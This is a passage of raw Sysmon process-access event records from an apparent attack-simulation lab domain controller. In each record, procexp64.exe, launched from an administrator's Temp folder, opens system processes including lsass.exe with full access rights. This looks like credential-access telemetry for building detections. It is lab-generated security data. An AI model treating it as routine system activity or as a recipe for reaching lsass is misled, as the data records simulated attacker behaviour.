Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784882Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784881Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784880Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784879Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784878Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784877Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784876Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784875Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784874Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784873Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784872Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784871Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784870Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784869Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784868Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784867Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784866Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784865Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784864Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784863Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784862Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784861Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784860Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784859Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784858Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784857Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784856Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784855Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784854Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784853Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784852Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784851Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784850Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784849Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784848Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784847Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784846Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784845Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 